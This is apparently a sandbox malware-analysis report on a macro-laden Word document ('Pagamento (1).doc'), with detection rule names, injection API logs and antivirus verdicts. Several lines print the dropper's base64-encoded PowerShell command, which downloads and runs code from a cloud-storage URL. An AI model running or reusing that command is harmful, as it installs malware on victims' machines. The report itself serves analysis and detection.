description	Bypass DEP	rule	disable_dep
description	Communications use DNS	rule	Network_DNS
description	task schedule	rule	schtasks_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Detection of Virtual Appliances through the use of WMI for use of evasion.	rule	WMI_VM_Detect
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Run a KeyLogger	rule	KeyLogger
description	File Downloader	rule	Network_Downloader

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	ping -n 10 localhost
cmdline	chcp 65001

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2412 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000378		3221225496	0
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2412 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000378	1	0	0

A potential heapspray has been detected. 182 megabytes was sprayed onto the heap of the powershell.exe process (1 event)

count

2919

name

heapspray

process

powershell.exe

total_mb

182

length

65536

protection

PAGE_READWRITE

Manipulates memory of a non-child process indicative of process injection (3 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2184 manipulating memory of non-child process 2412
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2412 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000378		3221225496	0
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2412 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000378	1	0	0

Potential code injection by writing to the memory of another process (5 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2184 injected into non-child 2412
WriteProcessMemory June 18, 2023, 12:13 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÃÎD`à0® @ `` KÀ à H.text´ `.rsrc À@@.relocà@B base_address: 0x000d0000 process_identifier: 2412 process_handle: 0x00000378	1	1	0
WriteProcessMemory June 18, 2023, 12:13 p.m.	buffer: P8h À¼Ã×4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°\|StringFileInfoX000004b0Comments"CompanyName: FileDescriptionVenomBin0FileVersion2.7.0.0: InternalNameVenombin.exeHLegalCopyrightCopyright © 2021LegalTrademarksB OriginalFilenameVenombin.exe2 ProductNameVenomBin4ProductVersion2.7.0.08Assembly Version2.7.0.0ï»¿<?xml version="1.0" encoding="utf-8"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!-- Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!-- Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> <application xmlns="urn:schemas-microsoft-com:asm.v3"> <windowsSettings> <dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true/pm</dpiAware> <dpiAwareness xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">PerMonitorV2, PerMonitor</dpiAwareness> <longPathAware xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">true</longPathAware> </windowsSettings> </application> <dependency> <dependentAssembly> <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="" publicKeyToken="6595b64144ccf1df" language="*" /> </dependentAssembly> </dependency> </assembly> base_address: 0x001dc000 process_identifier: 2412 process_handle: 0x00000378	1	1	0
WriteProcessMemory June 18, 2023, 12:13 p.m.	buffer: °0 base_address: 0x001de000 process_identifier: 2412 process_handle: 0x00000378	1	1	0
WriteProcessMemory June 18, 2023, 12:13 p.m.	buffer: base_address: 0x7efde008 process_identifier: 2412 process_handle: 0x00000378	1	1	0

Code injection by writing an executable or DLL to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2184 injected into non-child 2412
WriteProcessMemory June 18, 2023, 12:13 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÃÎD`à0® @ `` KÀ à H.text´ `.rsrc À@@.relocà@B base_address: 0x000d0000 process_identifier: 2412 process_handle: 0x00000378	1	1	0

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send June 18, 2023, 12:13 p.m.	buffer: }dvhò#^MðÜ/x8zå%ñd£QVKé¢¦\</5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com socket: 1400 sent: 134	1	134
send June 18, 2023, 12:13 p.m.	buffer: FBAv¤¦¬5&ggªðe;NÅ¹uînh¼Ü_ HF¤MaIXÆÞÖD@ð§¨(¶Z%cm%ZùÇ¤ïï}40³6ªV-¯¢gh}ù~bàUÁGH51ôîþÄÉè3-EÿÀg¥÷;zÞ socket: 1400 sent: 134	1	134
send June 18, 2023, 12:13 p.m.	buffer: À[ÕFyßPþÄ¹â&OWm.h4¿rá& EsÎP!\|Y&)o©\|=ÙÆt*:âÏ®7g?ÏS4pt¹Z&Lº{Z³q?W°ÙmççndQ~jd+`_µ9göCü}ö4=ÊþZâEjØØ9ìý$¡8ãMïµ¥OrM»pQ¾AøøÆ¶~O¬è:F@xÉe¿@¢FhNw4 ¡L¥ socket: 1400 sent: 197	1	197

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2184 called NtSetContextThread to modify thread in remote process 2412
NtSetContextThread June 18, 2023, 12:13 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 5284014 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000374 process_identifier: 2412	1	0	0

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
parent_process	winword.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBmAGkAcgBlAGIAYQBzAGUAcwB0AG8AcgBhAGcAZQAuAGcAbwBvAGcAbABlAGEAcABpAHMALgBjAG8AbQAvAHYAMAAvAGIALwBmAGkAcgAtADgAYwAxADQAZgAuAGEAcABwAHMAcABvAHQALgBjAG8AbQAvAG8ALwBqAG8AZAAuAGoAcABnAD8AYQBsAHQAPQBtAGUAZABpAGEAJgB0AG8AawBlAG4APQAzADcAMwA1AGYAMQBjAGMALQAzADUAZAAwAC0ANABjAGUAYQAtADgAYQAyADkALQA4ADEAMQBjAGUAYwA3ADEAZgBlADEAYgAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
parent_process	winword.exe	martian_process	Powershell -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBmAGkAcgBlAGIAYQBzAGUAcwB0AG8AcgBhAGcAZQAuAGcAbwBvAGcAbABlAGEAcABpAHMALgBjAG8AbQAvAHYAMAAvAGIALwBmAGkAcgAtADgAYwAxADQAZgAuAGEAcABwAHMAcABvAHQALgBjAG8AbQAvAG8ALwBqAG8AZAAuAGoAcABnAD8AYQBsAHQAPQBtAGUAZABpAGEAJgB0AG8AawBlAG4APQAzADcAMwA1AGYAMQBjAGMALQAzADUAZAAwAC0ANABjAGUAYQAtADgAYQAyADkALQA4ADEAMQBjAGUAYwA3ADEAZgBlADEAYgAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2184 resumed a thread in remote process 2412
Process injection	Process 1184 resumed a thread in remote process 2356
NtResumeThread June 18, 2023, 12:13 p.m.	thread_handle: 0x00000374 suspend_count: 1 process_identifier: 2412	1	0	0
NtResumeThread June 18, 2023, 12:15 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2356	1	0	0

Executed a process and injected code into it, probably while unpacking (29 events)

Time & API	Arguments	Status	Return
NtResumeThread June 18, 2023, 12:13 p.m.	thread_handle: 0x000004a8 suspend_count: 1 process_identifier: 3036	1	0
NtResumeThread June 18, 2023, 12:13 p.m.	thread_handle: 0x00000544 suspend_count: 1 process_identifier: 3036	1	0
NtResumeThread June 18, 2023, 12:13 p.m.	thread_handle: 0x0000054c suspend_count: 1 process_identifier: 3036	1	0
CreateProcessInternalW June 18, 2023, 12:13 p.m.	thread_identifier: 1784 thread_handle: 0x000005d8 process_identifier: 2184 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBmAGkAcgBlAGIAYQBzAGUAcwB0AG8AcgBhAGcAZQAuAGcAbwBvAGcAbABlAGEAcABpAHMALgBjAG8AbQAvAHYAMAAvAGIALwBmAGkAcgAtADgAYwAxADQAZgAuAGEAcABwAHMAcABvAHQALgBjAG8AbQAvAG8ALwBqAG8AZAAuAGoAcABnAD8AYQBsAHQAPQBtAGUAZABpAGEAJgB0AG8AawBlAG4APQAzADcAMwA1AGYAMQBjAGMALQAzADUAZAAwAC0ANABjAGUAYQAtADgAYQAyADkALQA4ADEAMQBjAGUAYwA3ADEAZgBlADEAYgAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000005dc	1	1
NtResumeThread June 18, 2023, 12:13 p.m.	thread_handle: 0x000005c8 suspend_count: 1 process_identifier: 3036	1	0
NtResumeThread June 18, 2023, 12:14 p.m.	thread_handle: 0x000005f4 suspend_count: 1 process_identifier: 3036	1	0
NtResumeThread June 18, 2023, 12:13 p.m.	thread_handle: 0x00000298 suspend_count: 1 process_identifier: 2184	1	0
NtResumeThread June 18, 2023, 12:13 p.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 2184	1	0
NtResumeThread June 18, 2023, 12:13 p.m.	thread_handle: 0x00000438 suspend_count: 1 process_identifier: 2184	1	0
NtResumeThread June 18, 2023, 12:13 p.m.	thread_handle: 0x0000055c suspend_count: 1 process_identifier: 2184	1	0
CreateProcessInternalW June 18, 2023, 12:13 p.m.	thread_identifier: 2408 thread_handle: 0x00000374 process_identifier: 2412 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe track: 1 command_line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000378	1	1
NtGetContextThread June 18, 2023, 12:13 p.m.	thread_handle: 0x00000374	1	0
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2412 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000378		3221225496
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2412 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000378	1	0
WriteProcessMemory June 18, 2023, 12:13 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÃÎD`à0® @ `` KÀ à H.text´ `.rsrc À@@.relocà@B base_address: 0x000d0000 process_identifier: 2412 process_handle: 0x00000378	1	1
WriteProcessMemory June 18, 2023, 12:13 p.m.	buffer: base_address: 0x000d2000 process_identifier: 2412 process_handle: 0x00000378	1	1
WriteProcessMemory June 18, 2023, 12:13 p.m.	buffer: P8h À¼Ã×4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°\|StringFileInfoX000004b0Comments"CompanyName: FileDescriptionVenomBin0FileVersion2.7.0.0: InternalNameVenombin.exeHLegalCopyrightCopyright © 2021LegalTrademarksB OriginalFilenameVenombin.exe2 ProductNameVenomBin4ProductVersion2.7.0.08Assembly Version2.7.0.0ï»¿<?xml version="1.0" encoding="utf-8"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!-- Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!-- Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> <application xmlns="urn:schemas-microsoft-com:asm.v3"> <windowsSettings> <dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true/pm</dpiAware> <dpiAwareness xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">PerMonitorV2, PerMonitor</dpiAwareness> <longPathAware xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">true</longPathAware> </windowsSettings> </application> <dependency> <dependentAssembly> <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="" publicKeyToken="6595b64144ccf1df" language="*" /> </dependentAssembly> </dependency> </assembly> base_address: 0x001dc000 process_identifier: 2412 process_handle: 0x00000378	1	1
WriteProcessMemory June 18, 2023, 12:13 p.m.	buffer: °0 base_address: 0x001de000 process_identifier: 2412 process_handle: 0x00000378	1	1
WriteProcessMemory June 18, 2023, 12:13 p.m.	buffer: base_address: 0x7efde008 process_identifier: 2412 process_handle: 0x00000378	1	1
NtSetContextThread June 18, 2023, 12:13 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 5284014 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000374 process_identifier: 2412	1	0
NtResumeThread June 18, 2023, 12:13 p.m.	thread_handle: 0x00000374 suspend_count: 1 process_identifier: 2412	1	0
NtResumeThread June 18, 2023, 12:13 p.m.	thread_handle: 0x000003b8 suspend_count: 1 process_identifier: 2184	1	0
CreateProcessInternalW June 18, 2023, 12:15 p.m.	thread_identifier: 2388 thread_handle: 0x00000088 process_identifier: 2380 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\chcp.com track: 1 command_line: chcp 65001 filepath_r: C:\Windows\system32\chcp.com stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW June 18, 2023, 12:15 p.m.	thread_identifier: 2452 thread_handle: 0x00000088 process_identifier: 2464 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\PING.EXE track: 1 command_line: ping -n 10 localhost filepath_r: C:\Windows\system32\PING.EXE stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
CreateProcessInternalW June 18, 2023, 12:15 p.m.	thread_identifier: 296 thread_handle: 0x00000084 process_identifier: 2356 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe track: 1 command_line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
NtResumeThread June 18, 2023, 12:15 p.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2356	1	0
NtResumeThread June 18, 2023, 12:15 p.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 2356	1	0
NtResumeThread June 18, 2023, 12:15 p.m.	thread_handle: 0x00000158 suspend_count: 1 process_identifier: 2356	1	0
NtResumeThread June 18, 2023, 12:15 p.m.	thread_handle: 0x000001cc suspend_count: 1 process_identifier: 2356	1	0

File has been identified by 37 AntiVirus engines on VirusTotal as malicious (37 events)

Lionic	Trojan.MSExcel.Valyria.4!c
Elastic	malicious (high confidence)
MicroWorld-eScan	VB:Trojan.Valyria.8184
FireEye	VB:Trojan.Valyria.8184
ALYac	VB:Trojan.Valyria.8184
VIPRE	VB:Trojan.Valyria.8184
Sangfor	VBA.Sus.Obf
K7AntiVirus	Trojan ( 00536d111 )
K7GW	Trojan ( 00536d111 )
Arcabit	VB:Trojan.Valyria.D1FF8
VirIT	Office.VBA_Macro_Heur
Cyren	ABRisk.YFZX-
Symantec	CL.Downloader!gen9
ESET-NOD32	VBA/TrojanDownloader.Agent.ZAK
Cynet	Malicious (score: 99)
Avast	Script:SNH-gen [Drp]
Kaspersky	HEUR:Trojan.MSOffice.SAgent.gen
BitDefender	VB:Trojan.Valyria.8184
NANO-Antivirus	Trojan.Ole2.Vbs-heuristic.druvzi
Tencent	Trojan.MsOffice.MacroV.11000076
Emsisoft	VB:Trojan.Valyria.8184 (B)
F-Secure	Heuristic.HEUR/Macro.Downloader.MRAIR.Gen
McAfee-GW-Edition	BehavesLike.OLE2.Downloader.cg
Ikarus	Win32.Outbreak
Avira	HEUR/Macro.Downloader.MRAIR.Gen
MAX	malware (ai score=89)
Gridinsoft	Backdoor.U.Quasar.bot
ZoneAlarm	HEUR:Trojan.MSOffice.SAgent.gen
GData	VB:Trojan.Valyria.8184
Google	Detected
Acronis	suspicious
McAfee	RDN/Generic Downloader.x
Zoner	Probably Heur.W97ShellS
Rising	Downloader.Agent/VBA!8.109E7 (TOPIS:E0:ojTsLykzVKS)
SentinelOne	Static AI - Malicious OLE
Fortinet	VBA/Agent.3608!tr
AVG	Script:SNH-gen [Drp]

The processes winword.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Pagamento (1).doc

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All